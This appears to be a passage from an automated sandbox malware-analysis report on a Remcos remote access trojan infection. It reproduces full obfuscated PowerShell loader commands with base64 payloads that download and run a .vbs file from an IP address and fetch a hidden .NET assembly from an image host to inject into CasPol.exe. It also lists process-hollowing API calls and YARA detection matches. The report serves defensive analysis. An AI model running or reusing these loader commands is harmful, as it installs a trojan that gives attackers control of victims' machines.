                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnasterJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_00417245
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041ACD1 OpenProcess,NtSuspendProcess,CloseHandle,10_2_0041ACD1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041ACFD OpenProcess,NtResumeProcess,CloseHandle,10_2_0041ACFD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00402CAC NtdllDefWindowProc_A,14_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00402D66 NtdllDefWindowProc_A,14_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_004158B9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04CE76587_2_04CE7658
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04CEB8907_2_04CEB890
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04CEA6E87_2_04CEA6E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004520E210_2_004520E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041D08110_2_0041D081
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043D0A810_2_0043D0A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043716010_2_00437160
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004361BA10_2_004361BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0042626410_2_00426264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043138710_2_00431387
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043652C10_2_0043652C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041E5EF10_2_0041E5EF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0044C74910_2_0044C749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004367D610_2_004367D6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004267DB10_2_004267DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043C9ED10_2_0043C9ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00432A5910_2_00432A59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00436A9D10_2_00436A9D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043CC1C10_2_0043CC1C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00436D5810_2_00436D58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00434D3210_2_00434D32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0043CE4B10_2_0043CE4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00440E3010_2_00440E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00426E8310_2_00426E83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00412F4510_2_00412F45
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00452F1010_2_00452F10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00426FBD10_2_00426FBD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_1001719410_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_1000B5C110_2_1000B5C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044B04011_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043610D11_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044731011_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044A49011_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040755A11_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043C56011_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044B61011_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044D6C011_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004476F011_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044B87011_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044081D11_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041495711_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004079EE11_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00407AEB11_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044AA8011_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00412AA911_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404B7411_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404B0311_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044BBD811_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404BE511_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00404C7611_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00415CFE11_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00416D7211_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00446D3011_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00446D8B11_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406E8F11_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040503812_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041208C12_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004050A912_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040511A12_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C13A12_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004051AB12_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044930012_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040D32212_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044A4F012_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A5AB12_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041363112_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044669012_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044A73012_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004398D812_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004498E012_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044A88612_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043DA0912_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00438D5E12_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00449ED012_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041FE8312_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00430F5412_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004050C214_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004014AB14_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040513314_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004051A414_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040124614_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040CA4614_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040523514_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004032C814_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_0040168914_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00402F6014_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FC0 appears 55 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338B5 appears 40 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2035
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2002
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2035Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2002Jump to behavior
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
